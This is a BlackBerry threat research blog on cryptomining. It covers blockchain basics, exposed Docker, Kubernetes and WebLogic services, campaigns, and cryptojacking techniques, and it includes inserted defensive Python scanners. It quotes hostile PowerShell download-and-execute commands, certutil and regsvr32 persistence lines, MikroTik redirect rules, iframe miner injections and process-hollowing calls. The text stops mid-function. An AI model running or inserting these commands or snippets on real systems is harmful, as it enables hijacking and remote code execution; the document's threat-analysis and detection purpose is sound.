BlackBerry Blog

Threat Research Report: The State of Cryptomining


Technology outpaces security; throughout the history of human invention we’ve traditionally leveraged technology before fully exploring its potential risks, and certainly long before developing appropriate security measures to safeguard users against potential attacks.

In this blog, we’ll discuss how cryptomining started, what targets are being mined, and exactly how threat actors are doing this. Our goal is to provide some context and instruction on how to protect your organization from cryptomining attacks.


During the 1990s, research scientists Stuart Haber and W. Scott Stornetta developed a system called blockchain. This system was used to resolve weaknesses in time-stamping digital documents. It was built on the concept of a cryptographically secured chain of blocks that stores the time-stamped documents. However, the system also relied on signatures issued by a trustee, which left the solution vulnerable to integrity weaknesses.

In 2008 a pseudonymous person or group known as Satoshi Nakamoto conceptualized the idea behind blockchain. They improved the solution by implementing cryptographic signatures to timestamp digital documents, thus removing the risk of relying on trust.

In the following section we will look at the rise of cryptocurrency and explore how blockchain works.

The Financial Era of 2009

To understand the need for cryptocurrency, we need to look back at the global financial crisis of 2007 to early 2009. During this crisis, people lost their trust in banks. With this weakness in the trust model, people wanted an alternative system that provided transparency, authentication, and auditing.

On January 3rd 2009, the bitcoin network was released. This network was built to provide a decentralized payment network. The network uses a distributed ledger and cryptographic signatures, instead of relying on a centralized ledger built on a trust model.

In the following section we will outline the mechanics of blockchain.

Mechanics Within Blockchain

Blockchain operates on a flat peer-to-peer (P2P) network. Within this network, transactions are broadcast to all nodes:

Figure 1: Connected Peers

Electronic coins are used in these transactions; these coins contain digital signatures. Each owner transfers the coin to the next by digitally signing a hash of the previous transaction and the public key of the next owner. This record is then appended to the end of the coin. An illustration of this is available in Satoshi's paper (in the transaction section).

Nodes compete in a race to identify the correct hash belonging to the owner signature. The number of participating nodes increases or decreases the time it takes for a node to identify a transaction block; the goal is to keep finding a new block once every ten minutes. Once a transaction block is identified, a verification process is initiated in which the rest of the nodes validate whether the node has correctly identified the transaction. If more than fifty percent of the nodes agree that the block was correctly identified, the block is then included in the ledger.
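To make the race and the verification step concrete, here is a small proof-of-work simulation added for this article; it is not code from the original post or from any real node software. The block layout, the double SHA-256 hash and the `difficulty_bits` parameter are assumptions chosen for the demonstration: finding a valid nonce costs about 2^difficulty_bits hash attempts on average, while any other node can check the result with a single hash, which is the asymmetry the validation step relies on.

```python
import hashlib
import json

# Assumed block layout for this demonstration: a dict of fields serialised as
# canonical JSON and hashed with double SHA-256 (an assumption, not a real protocol).
def block_hash(block: dict) -> bytes:
    payload = json.dumps(block, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()


def meets_target(digest: bytes, difficulty_bits: int) -> bool:
    # The hash, read as a 256-bit integer, must fall below 2^(256 - difficulty_bits).
    # Each extra difficulty bit halves the fraction of acceptable hashes.
    return int.from_bytes(digest, "big") < (1 << (256 - difficulty_bits))


def mine(prev_hash: str, transactions: list, difficulty_bits: int) -> dict:
    """The race: try nonces until the block hash meets the target (~2^difficulty_bits attempts)."""
    block = {"prev_hash": prev_hash, "transactions": transactions,
             "difficulty_bits": difficulty_bits, "nonce": 0}
    while not meets_target(block_hash(block), difficulty_bits):
        block["nonce"] += 1
    return block


def verify_block(block: dict, expected_prev_hash: str) -> bool:
    """What every other node does: one hash to check the work, plus the chain link."""
    return (block["prev_hash"] == expected_prev_hash
            and meets_target(block_hash(block), block["difficulty_bits"]))


GENESIS_PREV = "00" * 32  # constructed sentinel for the first block


def build_chain(n_blocks: int, difficulty_bits: int) -> list:
    chain, prev = [], GENESIS_PREV
    for i in range(n_blocks):
        # constructed transactions: one coinbase payout per block
        block = mine(prev, [f"coinbase -> miner{i}"], difficulty_bits)
        chain.append(block)
        prev = block_hash(block).hex()
    return chain


def chain_valid(chain: list) -> bool:
    prev = GENESIS_PREV
    for block in chain:
        if not verify_block(block, prev):
            return False
        prev = block_hash(block).hex()
    return True


if __name__ == "__main__":
    chain = build_chain(3, 16)
    print("valid chain:", chain_valid(chain), "nonces:", [b["nonce"] for b in chain])
    chain[0]["transactions"].append("coinbase -> attacker")  # rewrite history in block 0
    print("after tampering:", chain_valid(chain))
```

Raising `difficulty_bits` by one doubles the expected mining time while leaving verification cost unchanged, which is the knob a real network turns to keep the block interval near its target. Editing an old block invalidates its own proof and breaks the `prev_hash` link of every block after it, so the tampered chain fails validation.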

Now that we have a basic understanding of how this electronic payment system works, let’s review its volume.

The Flow of Traffic  

To ensure cryptocurrency is issued at a steady pace, a process known as block halving is used. Block halving is a process of reducing the rate at which new cryptocurrency units are generated. Specifically, it refers to the periodical halving events that decrease the block rewards provided to miners.

Depending on the state of inflation, block halving normally occurs every four years. The image below illustrates the average number of transactions per block, since the beginning of blockchain’s history:

Figure 2: Average Transactions Per Block

As you can see, cryptomining has not stopped and traffic usually fluctuates yearly. The last bitcoin to be mined will be on May 7th, 2140.

Bitcoin is not the only type of cryptocurrency available. Below is a list of the top cryptocurrencies being mined and their proof-of-work hashing algorithms:

  • Litecoin uses the Scrypt algorithm for proof-of-work mining. It can be mined with CPUs, GPUs, or Scrypt ASICs; Scrypt ASICs are preferred.
  • Ravencoin uses the X16R algorithm for proof-of-work mining and supports GPU mining.
  • Grin uses the Cuckoo Cycle algorithm, which depends on memory bandwidth rather than raw CPU or GPU speed.
  • Horizen uses the Equihash algorithm for proof-of-work mining, which depends on memory bandwidth rather than raw CPU or GPU speed.
  • AEON uses the CryptoNight-Lite algorithm for proof-of-work mining and can be mined with CPUs and GPUs.
  • Electroneum uses the CryptoNight algorithm for proof-of-work mining and can be mined with CPUs, GPUs, or ASICs; ASICs are preferred.
  • Feathercoin uses the NeoScrypt algorithm for proof-of-work mining and supports GPU mining.
  • Vertcoin uses the Lyra2REv2 algorithm for proof-of-work mining and supports GPU mining.
  • Monero used the CryptoNight algorithm and now uses RandomX, both of which favour CPU mining.
  • Ethereum 1.0 uses the KECCAK-256 algorithm for proof-of-work mining and supports CPU and GPU mining; GPUs are preferred.

Knowing which hash algorithm a coin uses tells you which kinds of systems (CPU, GPU, or ASIC) can be used to mine it.

In addition to choosing which systems to target, processing power is an important factor for cryptomining. To turn a profit, threat actors focus on how many systems they can use to mine cryptocurrency and what is needed to stay hidden on those systems for a long period of time. For example, the Nansh0u campaign was identified to have started back in February by targeting MS-SQL and phpMyAdmin services around the world. This operation resulted in more than 50,000 MS-SQL and phpMyAdmin systems being used to mine TurtleCoin, another open-source cryptocurrency available to the public, using the XMRig and JCE cryptominers. TurtleCoin uses 12 proof-of-work algorithms, all of which are CPU friendly:

  • CryptoNight
  • CryptoNight v1
  • CryptoNight v2
  • CryptoNight Lite v0
  • CryptoNight Lite v1
  • CryptoNight Lite v2
  • CryptoNight Turtle v0
  • CryptoNight Turtle v1
  • CryptoNight Turtle v2
  • CryptoNight Soft Shell v0
  • CryptoNight Soft Shell v1
  • CryptoNight Soft Shell v2

System Failure

Internet-facing services, websites, and repositories are highly sought-after targets for threat actors seeking to deploy cryptomining operations. This is because they are often visited by users and tend to run on high performance systems. The following are examples of attacks which have impacted AWS running Docker or Kubernetes, websites powered by Content Management Systems (CMSs), and systems running Oracle WebLogic.

Attack 1

Threat actors have slip-streamed malicious images carrying cryptominers known as graboids into the Docker Hub, the world's largest library and community for container images. This attack resulted in more than 2,000 cryptominers being spread across the Amazon cloud. Normally, Docker containers are not inspected by security products. When Docker containers are exposed on the Internet they quickly become a sought-after target.

The following images highlight a search query for publicly exposed Docker engines, which returned 15,914 instances:

Figure 3: 15,914 Exposed Docker Containers

Figure 4: Top Organization Exposing Docker Containers

Researchers from cyber threat intelligence firm Bad Packets recently identified an operation performing mass scans for Docker hosts that expose their API endpoints. These APIs allow threat actors to deploy commands used to perform cryptomining operations.

Attack 2

Threat actors identified and compromised hundreds of Internet-facing Kubernetes administration consoles operating a cluster of servers (without a password) hosted on Tesla's public cloud. Threat actors used these systems to install mining pool software and configured the systems to generate unlisted, semi-public endpoints to avoid detection. They also leveraged Cloudflare to hide the IP address of the mining pools. We have identified 10,520 exposed administrative consoles as of 2019:

Figure 5: 10,520 Exposed Kubernetes Master Servers

Attack 3

Threat actors behind a campaign dubbed “Kitty campaign” attacked websites running Drupal by exploiting CVE-2018-7600, which allowed them to write a malicious PHP backdoor to distribute cryptominers hidden in a file called me0w.js. This campaign impacted over 400 government and university websites worldwide.

Attack 4

Vulnerabilities found in Oracle WebLogic, CVE-2017-10271 and CVE-2019-2725, were exploited by threat actors in 2018 and 2019 to deploy cryptominers. We have identified 17,010 systems which are currently running on the default port TCP 7001, as shown in the output below:

Figure 6: 17,010 Exposed Oracle WebLogic Administration Servers

Attack 5

The Android Debug Bridge (ADB) was used by threat actors to exploit Android-based Internet of Things (IoT) devices. These are appealing targets as they are rarely monitored, usually remain on, and are usually connected to the Internet. The attack starts by mapping the Android Debug Bridge on TCP port 5555. The following image illustrates 10,197 public-facing Android devices:

Figure 7: 10,197 Exposed Android Devices

Attack 6

Cryptomining attacks aren’t just random; often, high profile victims are targeted in order to hijack their access to larger-scale resources. A social engineering attack was recently identified as being used by a Singaporean national to steal the identity of millionaire and Riot Games Co-Founder Marc Merrill. Merrill’s compromised identity was used to lease Amazon Web Services and Google cloud computing power to mine various cryptocurrencies, including bitcoin and Ether. The prosecutors alleged that at some point the attacker even became the largest AWS data consumer, adding:

“In the few months his scheme remained active, [attacker’s name removed] consumed more than $5 million in unpaid cloud computing services with his mining operation and, for a brief period, was one of Amazon Web Services (AWS) largest consumers of data usage by volume.”

Thanks to data such as IP addresses and login information provided by Amazon, Google, Facebook and others, police were able to track down the chief suspect. The suspected attacker was apprehended and is currently being charged with eight counts of wire fraud, four counts of access device fraud, and two counts of aggravated identity theft.  

In the following section we’ll look at examples of several tactics and tools used in the wild to deploy cryptominers.

Cryptojacking Techniques

Developers have built, and continue to build, programming libraries and interfaces used to mine for cryptocurrency, a practice also known as cryptomining. These tools are also combined with techniques that hijack a computer so that it runs a cryptominer. Hijacking a computer to run a cryptominer is called cryptojacking.

While we dive into various tools, techniques, and resources, we’d like to emphasize this point: a cryptominer used by threat actors should be seen as just another component that can be added to their toolset and, when the time is right, executed in response to triggered events. Given the examples mentioned above (or others easily found online), cryptojacking should not be seen as a nuisance but as an active and real threat.

Cryptomining JavaScript Libraries

CryptoLoot offers a script called crypta.js, whose use is currently on the rise. CryptoLoot provides an option to stay current with the latest obfuscation techniques to help avoid antivirus (AV) detection.

The following is an output displaying 4,387 systems leveraging this script:

Figure 8: 4,387 Systems Leveraging Crypto-Loot JS Script

Coinhive offered a script called Coinhive.min.js which allowed threat actors the ability to perform cryptomining operations. Coinhive has since been discontinued; however, there are still over 59,304 systems using it, as shown in the output below:

Figure 9: 59,304 Systems Leveraging Coinhive.min.js

Coinhive.min.js has widely been used in malvertising campaigns as this library makes it easy to embed code into highly trafficked websites. 

Cryptomining Application Interfaces

JSEcoin provides webmasters with code used to run cryptomining operations, which is also being picked up by threat actors. The following is an example of the code snippet that allows one to mine:

<script src="hxxps://load[.][.]com/optionalSubID/0/" async defer></script>

It works by pointing to hxxps://load[.][.]com/optionalSubID, an API used to interface with the JSEcoin server:

Figure 10: JSEcoin Server v1.9.2

The number of miners leveraging JSEcoin is also increasing, as highlighted in the output below:

Figure 11: Total Number of Miners Mining for JSEcoin

Cryptomining Web Assembly Modules

WebAssembly (WASM) is a binary instruction format for a stack-based virtual machine (VM). It processes low-level bytecode, which makes it fast, and it is designed to be a portable compilation target for high-level languages such as C, C++, Rust, and Golang. WASM is supported by many web browsers, such as Firefox, Chrome, WebKit/Safari and Microsoft Edge. Cryptominers such as cryptonight[.]wasm have been developed in this format and are being used by threat actors. For example,

Public Platforms and Repositories

Public-facing resources such as YouTube and GitHub give threat actors a way to bypass outbound firewall restrictions and provide avenues for spreading cryptominers.

For example, YouTube provides an advertising service which allows users to include iframe tags, which threat actors use to embed JavaScript libraries designed to perform cryptomining. Recently, a botnet known as Stantinko used YouTube ads to spread cryptominers, which infected more than 500,000 devices around the world.

GitHub carries a wealth of open-source cryptominers, which makes it easy for threat actors to modify the code and include it in their resources. For example, hxxps://github[.]com/fireice-uk/xmr-stak was adopted by the Stantinko botnet. In addition to the free code available on GitHub, public repos can be used to secretly store backdoored cryptominers, such as Monero miners.

GitHub is not the only public repository used to load cryptominers. In 2018, a campaign was launched targeting Kodi add-ons, which generated 62.57 Monero coins, equal to at least $7,000. Threat actors accomplished this by loading their cryptominers into the XvBMC, Bubbles, and Gaia add-on repositories.

Cryptomining Browser Extensions

Threat actors deploying cryptominers have leveraged Chrome and Firefox add-on repos to store cryptominers disguised as innocent extensions, such as Image Previewer or Nigelify. A 2018 campaign deploying NigelThorn was identified to have leveraged browser extensions to infect more than 100,000 machines.

Traffic Redirection Techniques

A Coinhive campaign was recently launched targeting MikroTik routers, in which over 200,000 MikroTik routers were compromised and used to mine Monero coins. Threat actors behind this campaign deployed scripts designed to create firewall rules like those shown below, which redirected users to a Coinhive landing page:

  • /ip proxy set enabled=yes
  • /ip proxy access add action=deny disabled=no
  • /ip firewall nat remove [find comment=sysadminpxy]
  • /ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy
  • /ip firewall nat move [find comment=sysadminpxy] destination=0
  • /ip firewall filter remove [find comment=sysadminpxy]
  • /ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=15s comment=sysadminpxy
  • /ip dns set servers=
  • /ip service set www disabled=yes port=80  
  • /ip service set winbox disabled=no port=8291
  • /ip cloud set ddns-enabled=yes
  • /interface wireless security print file=sn112
  • /interface wireless print file=sn113
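A defender can look for exactly this pattern in a RouterOS configuration export. The following audit script is an addition to this article, not code from the original post or from MikroTik; it parses command lines of the form shown above into a command path plus key=value settings and flags the combinations that characterise the campaign (transparent proxy enabled, port 80 traffic redirected to a local port, DNS servers changed, the web admin service disabled, cloud DDNS turned on, wireless settings dumped to a file). The rule names, the sample export (a copy of the rule set above) and the benign comparison lines are constructed for the example.

```python
def parse_command(line: str):
    """Split a RouterOS CLI line into (command path, {key: value}).
    Bracketed '[find ...]' selectors are flattened: their key=value pairs join the settings."""
    path, settings = [], {}
    for token in line.strip().split():
        token = token.strip("[]")
        if not token or token == "find":
            continue
        if "=" in token:
            key, _, value = token.partition("=")
            settings[key] = value
        elif not settings:  # positional words before the first key=value belong to the path
            path.append(token)
    return " ".join(path), settings


# Detection rules: (finding name, predicate over (path, settings)). Names are constructed.
RULES = [
    ("transparent-proxy-enabled",
     lambda p, s: p == "/ip proxy set" and s.get("enabled") == "yes"),
    ("http-redirect-to-local-port",
     lambda p, s: p == "/ip firewall nat add" and s.get("chain") == "dstnat"
     and s.get("action") == "redirect" and s.get("dst-port") == "80"),
    ("dns-servers-modified",
     lambda p, s: p == "/ip dns set" and "servers" in s),
    ("web-admin-service-disabled",
     lambda p, s: p == "/ip service set www" and s.get("disabled") == "yes"),
    ("cloud-ddns-enabled",
     lambda p, s: p == "/ip cloud set" and s.get("ddns-enabled") == "yes"),
    ("wireless-config-exported-to-file",
     lambda p, s: p.startswith("/interface wireless") and p.endswith("print") and "file" in s),
]


def audit_routeros_export(text: str):
    """Return [(finding, offending line)] for every line that trips a rule."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        path, settings = parse_command(line)
        for name, predicate in RULES:
            if predicate(path, settings):
                findings.append((name, line.strip()))
    return findings


# Constructed copy of the rule set quoted in the article.
SAMPLE_EXPORT = """\
/ip proxy set enabled=yes
/ip proxy access add action=deny disabled=no
/ip firewall nat remove [find comment=sysadminpxy]
/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy
/ip firewall nat move [find comment=sysadminpxy] destination=0
/ip firewall filter remove [find comment=sysadminpxy]
/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=15s comment=sysadminpxy
/ip dns set servers=
/ip service set www disabled=yes port=80
/ip service set winbox disabled=no port=8291
/ip cloud set ddns-enabled=yes
/interface wireless security print file=sn112
/interface wireless print file=sn113
"""

# Constructed benign lines that share vocabulary with the campaign but trip no rule.
CLEAN_EXPORT = """\
/ip firewall filter add chain=input protocol=tcp dst-port=22 action=accept comment=mgmt-ssh
/ip service set www disabled=no port=80
/ip dns print
"""

if __name__ == "__main__":
    for name, line in audit_routeros_export(SAMPLE_EXPORT):
        print(f"{name:36s} {line}")
    print("clean export findings:", audit_routeros_export(CLEAN_EXPORT))
```

Run it against `/export` output taken from a router; the redirect rule alone is worth an alert, and the two `print file=` lines are a reminder to rotate wireless credentials after a compromise because the script exfiltrates them to a file on the device.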

The number of compromised MikroTik routers has been reduced, as shown in the following output:

Figure 12: 22,490 Exposed MikroTik Routers

Code Injection Techniques

iframe tags allow threat actors to inject links pointing to pages that carry cryptominers. For example, the following code can be easily embedded within a website:

<iframe src="https://somesite[.]com/page[.]html" style="width:0;height:0;border:0; border:none;"></iframe> 

This code would then redirect victims to a page containing the following script:

<script src="https://somelandingpage/lib/coinhive[.]min[.]js"></script>
var miner = new CoinHive.Anonymous('YOUR-SITE-KEY-HERE');

Sources specified in an iframe can also point to file transfer operations, for example:

<iframe src=ftp://ftp:shadow[at]196[.] width=1 height=1 frameborder=0>
<iframe src=Photo.scr width=1 height=1 frameborder=0>
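The script-include and hidden-iframe patterns shown in this section and in the JavaScript library section above are straightforward to check for on your own pages. The scanner below is an addition to this article, not code from the original post or from any of the named services; it uses Python's `html.parser` to flag script tags that load the library names mentioned here (coinhive.min.js, crypta.js, and the JSEcoin loader path segment, which is an assumption taken from the snippet above), inline scripts that instantiate `CoinHive.Anonymous`, and iframes sized to be invisible. The sample page it scans is constructed and its domains are placeholders.

```python
import re
from html.parser import HTMLParser

# Library names and paths quoted in the article; the JSEcoin path segment is an assumption.
MINER_SRC_PATTERNS = [
    re.compile(r"coinhive\.min\.js", re.I),
    re.compile(r"crypta\.js", re.I),
    re.compile(r"/optionalSubID/", re.I),
]
INLINE_MINER_PATTERNS = [re.compile(r"CoinHive\.Anonymous\s*\(")]
# width:0 / height:0 in a style attribute (does not match width:0.5em or border:0)
ZERO_SIZE_STYLE = re.compile(r"\b(?:width|height)\s*:\s*0(?:px)?\s*(?:;|$)", re.I)


def is_hidden_iframe(attrs: dict) -> bool:
    """True for iframes that cannot be seen: zero-sized via CSS, or 0/1 px attributes."""
    if ZERO_SIZE_STYLE.search(attrs.get("style") or ""):
        return True
    return (attrs.get("width") in ("0", "1")) and (attrs.get("height") in ("0", "1"))


class MinerScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []        # (kind, detail)
        self._script_body = None  # collects inline script text while inside <script>

    def handle_starttag(self, tag, attrs):
        attrs = {k: v for k, v in attrs}
        if tag == "script":
            self._script_body = []
            src = attrs.get("src") or ""
            if any(p.search(src) for p in MINER_SRC_PATTERNS):
                self.findings.append(("miner-script-include", src))
        elif tag == "iframe" and is_hidden_iframe(attrs):
            self.findings.append(("hidden-iframe", attrs.get("src") or ""))

    def handle_data(self, data):
        if self._script_body is not None:
            self._script_body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_body is not None:
            body = "".join(self._script_body)
            self._script_body = None
            if any(p.search(body) for p in INLINE_MINER_PATTERNS):
                self.findings.append(("inline-miner-start", body.strip()[:60]))


def scan_html(html: str):
    """Return the list of (kind, detail) findings for one HTML document."""
    scanner = MinerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: two legitimate embeds followed by the injection patterns from the article.
SAMPLE_PAGE = """<html><body>
<h1>Constructed sample page</h1>
<script src="https://cdn.example.com/app.js"></script>
<iframe src="https://video.example.com/embed/123" width="560" height="315"></iframe>
<iframe src="https://somesite.example/page.html" style="width:0;height:0;border:0; border:none;"></iframe>
<script src="https://landing.example/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE-KEY-PLACEHOLDER'); miner.start();</script>
<iframe src=Photo.scr width=1 height=1 frameborder=0>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind:22s} {detail}")
```

The hidden-iframe check is deliberately independent of the destination: an injected frame pointing at a page you have never heard of is the interesting case, so matching on size rather than on a domain list catches the unknown landing page as well as the known library names.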

PHP injections are commonly used to write PHP shells that execute system commands. Threat actors will enumerate a target for PHP functions that fail to sanitize input, for example:


This example demonstrates a vulnerability found in ThinkPHP v5.0.23 and v5.1.31. Threat actors have leveraged this vulnerability to inject SpeakUp payloads as a way to spread XMRig cryptominers.

Process hollowing is commonly used by loaders to inject cryptominers into memory. The hollowed process is usually disguised under a native process name, such as svchost.exe. Process hollowing typically uses VirtualAllocEx (MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) together with WriteProcessMemory(), rather than the PAGE_EXECUTE_WRITECOPY protection seen on the image sections of normally loaded processes, which is one way to spot it. Threat actors have also enhanced this technique by parsing ntdll.dll and calling native system functions directly to avoid detection. For example, they can call GetModuleHandleA("ntdll.dll") to obtain a handle to ntdll.dll and then use GetProcAddress to locate the following native system calls, used to load the cryptominer into memory:

  • NtUnmapViewOfSection() – used to unmap the original cryptominer module.
  • NtCreateSection() – used to create a section in which to write the cryptominer code.
  • NtMapViewOfSection() – used to map the above section into a native process, such as svchost.exe.
  • NtWriteVirtualMemory() – used to write the ImageBaseAddress of the current process to the ImageBaseAddress of the hollowed process's environment block.
  • NtResumeThread() – used to resume the suspended process and start execution.

Command Execution Techniques

Researchers from cybersecurity firm Imperva identified that 90% of the attacks deploying cryptominers involved remote command execution. Remote command execution can be achieved in many ways, from pivoting on vulnerable application functions, such as PHP's include() or Java's java.lang.Runtime.getRuntime().exec(), to leveraging native binaries to perform remote code execution, such as:

cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('DSM Event Log Filter')))) {IEX(New-Object Net.WebClient).DownloadString('hxxp://')}


powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%cert.cer (New-Object Net.WebClient).DownloadString('hxxp://'); certutil -decode %APPDATA%cert.cer %APPDATA%update.ps1 & start /b cmd /c powershell.exe -Exec Bypass -NoExit -File %APPDATA%update.ps1 & start /b cmd /c del %APPDATA%cert.cer

Commands like these are used to execute cryptominers. XSL transformations can also be used to execute system commands and can be embedded in different file formats, such as OOXML documents or a Windows Script Component. An example of this technique is shown below:

schtasks.exe /Create /SC MINUTE /TN example /TR "regsvr32 /s /n /u /i: scrobj.dll" /MO 5 /F

Figure 13: XML Payload Example

Additional information on XSL can be found here. Living off the land provides an easy way to avoid threat detection, and many of these examples can be found over at
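For detection, the command lines quoted in this section carry several reusable indicators: a hidden PowerShell window, an execution-policy bypass, `DownloadString` and `IEX`, `certutil -decode`, `regsvr32` with `/i:` and scrobj.dll, and a scheduled task firing every few minutes. The triage script below is an addition to this article, not code from the original post or from any vendor product; it runs a set of regular expressions over process-creation command lines (the three commands quoted above, with the removed URLs replaced by a placeholder, plus three constructed benign administrative lines) and marks a line suspicious when it trips two indicators or one high-confidence indicator. Indicator names, weights and sample lines are constructed.

```python
import re

# Each indicator is a case-insensitive regex over the raw command line. Names are constructed.
INDICATORS = {
    "ps-hidden-window": re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden", re.I),
    "ps-exec-bypass": re.compile(r"-ex(?:ec(?:utionpolicy)?)?\s+bypass", re.I),
    "ps-noprofile-noninteractive": re.compile(r"-nop\b.*-noni\b", re.I),
    "download-string": re.compile(r"downloadstring\s*\(", re.I),
    "invoke-expression": re.compile(r"\biex\s*\(|invoke-expression", re.I),
    "certutil-decode": re.compile(r"certutil(?:\.exe)?\s+-decode\b", re.I),
    "regsvr32-scriptlet": re.compile(r"regsvr32(?:\.exe)?\b.*/i:.*scrobj\.dll", re.I),
    "schtasks-minute-interval": re.compile(r"schtasks(?:\.exe)?\s+/create\b.*/sc\s+minute\b", re.I),
    "wmi-subscription-query": re.compile(r"root\\subscription", re.I),
}
# One of these alone is enough to escalate; the rest need a second indicator.
HIGH_CONFIDENCE = {"download-string", "certutil-decode", "regsvr32-scriptlet"}


def classify(cmdline: str):
    """Return (suspicious, [matched indicator names]) for one process command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    suspicious = len(hits) >= 2 or any(h in HIGH_CONFIDENCE for h in hits)
    return suspicious, hits


def triage(cmdlines):
    """Classify a batch of command lines, e.g. from Sysmon event ID 1 or Security 4688 logs."""
    rows = []
    for cmdline in cmdlines:
        suspicious, hits = classify(cmdline)
        rows.append({"cmdline": cmdline, "suspicious": suspicious, "indicators": hits})
    return rows


# Constructed sample: the article's three quoted commands (removed URLs replaced by a placeholder)
# followed by three benign administrative command lines.
SAMPLE_CMDLINES = [
    r"""cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('DSM Event Log Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http://URL-PLACEHOLDER/')}""",
    r"""powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%cert.cer (New-Object Net.WebClient).DownloadString('http://URL-PLACEHOLDER/'); certutil -decode %APPDATA%cert.cer %APPDATA%update.ps1 & start /b cmd /c powershell.exe -Exec Bypass -NoExit -File %APPDATA%update.ps1 & start /b cmd /c del %APPDATA%cert.cer""",
    r"""schtasks.exe /Create /SC MINUTE /TN example /TR "regsvr32 /s /n /u /i: scrobj.dll" /MO 5 /F""",
    r"""powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1""",
    r"""schtasks.exe /Create /SC DAILY /TN NightlyBackup /TR "C:\scripts\backup.cmd" /ST 02:00""",
    r"""certutil.exe -verify C:\certs\server.cer""",
]

if __name__ == "__main__":
    for row in triage(SAMPLE_CMDLINES):
        flag = "SUSPICIOUS" if row["suspicious"] else "ok        "
        print(flag, row["indicators"], row["cmdline"][:70])
```

The regexes tolerate the abbreviated and mixed-case switch spellings PowerShell accepts (`-w hidden`, `-Win hiddeN`, `-Exec ByPasS`), which is what defeats exact-string matching in the quoted samples; the benign lines show that the same binaries with ordinary arguments stay below the threshold.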

Evading security products is of utmost importance when performing cryptojacking attacks. In order for threat actors to make real profit they need to stay hidden within the system or network to mine for a period of months.

Some of these techniques used in the wild include:

Watchdog - Once a loader injects a cryptominer into a native process such as svchost.exe, a second module is loaded into memory and acts as a watchdog for the cryptominer. Its purpose is to terminate and spawn the cryptominer whenever it detects an event, such as when an antivirus agent or task manager is launched. Examples of these cryptominers include the WinstarNssmMiner or the Norman cryptominer.

Steganography - Threat actors are shifting to leveraging different file formats such as .wav and .png files to evade detection. To further escape image recognition scanners, attackers have also leveraged compression algorithms such as gzip to hide code. BlackBerry Cylance threat researchers previously detailed how cryptominers have leveraged wav files to avoid detection in this blog.

Fileless Attacks - Interpreters such as PowerShell, NSIS, AutoIT, and AutoHotKey give threat actors the ability to avoid detection, as they can be used to execute payloads directly in memory. In addition, security solutions tend to rely on data pulled from samples built with commonly used compilers, such as MSVC. As an example, the following PowerShell scripts were used to craft and load GhostMiner:

NSIS allows developers to build plugins, such as CallAnsiPlugin, that can be used to call functions exported by a DLL. NSIS also includes plugin directories, which can store additional files. This gives threat actors a way of loading additional parameters from files which are not compiled into the executable, as seen in the deployment of the Norman cryptominer.

AutoIT and AutoHotKey are free, open-source scripting languages for Microsoft Windows. Developed for the purpose of automating tasks, they can be used to interact with Windows event hooks and to inject VBScript/JScript and DLLs into running processes. Threat actors tend to leverage shortcut links and scheduled tasks to invoke these interpreters with parameters stored in a file. An example of this behavior can be seen in the polymorphic cryptominer known as RETADUP:

In addition to the techniques used to evade security mentioned above, we have noticed the following methods used to propagate through a compromised network:

File sharing services (SMB) and Remote Desktop Services (RDP) have been widely used to spread across systems by threats like MadoMiner and Zombieboy. Exploits such as EternalBlue, BlueKeep, and DejaBlue make it even easier for threat actors to accomplish this. The following is a screenshot of 4,806,484 systems found exposing these entry points:

Figure 14: 4,806,484 Exposed Systems Services

Cryptojacking is not the only type of currency-generating attack known in the cryptoworld. There’s also what is known as ‘the 51% attack’, which has become mainstream and was even included in the sitcom Silicon Valley. The 51% attack refers to an attack on a Proof of Work blockchain where an operator leverages a group of miners to control more than 50% of the network's mining hash rate. When this happens, the operators would be able to reverse transactions or invalidate blocks of transactions.

Future Development in Cryptomining

In the tech world, we tend to adjust technology to fit our needs. One of those needs is the ability to maintain stability in the economy. People need to have faith in the economy, and trust that it will remain stable for long periods of time. Stablecoins are being developed to support this. Stablecoins are blockchain-based payments that aim to provide stability within cryptocurrency by leveraging fiat currency.

There are three types of fiat money: physical cash, central bank reserves, and commercial bank money. Currently, commercial bank money is the most likely to be used as collateral for stablecoins. Potential challenges exist within this solution, such as less regulation for big companies, and as cryptocurrency becomes more widely adopted it also becomes increasingly attractive to threat actors. Stablecoins, unfortunately, are still affected by cryptojacking techniques.

Cryptomining has a huge effect on energy consumption. Proof of Stake was developed as a solution to this problem. The issue arises because Proof of Work (PoW) miners compete in a race to solve a difficult puzzle. Proof of Stake aims to remove this processing-power race by applying a consensus algorithm which randomly chooses the winner based on the user's stake. The more coins owned by a miner, the more mining power they have, which in itself could cause issues in the foreseeable future.
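To show why stake-weighted selection tends to concentrate influence, here is a small simulation added for this article; it is not code from the original post and not any real chain's consensus algorithm. Validators are chosen with probability proportional to their stake, and each reward is added to the winner's stake, so over many rounds the largest holder's share of total stake, and therefore of future selections, stays at or above where it started. The validator names, stakes, reward size and random seed are constructed.

```python
import random


def select_validator(stakes: dict, u: float) -> str:
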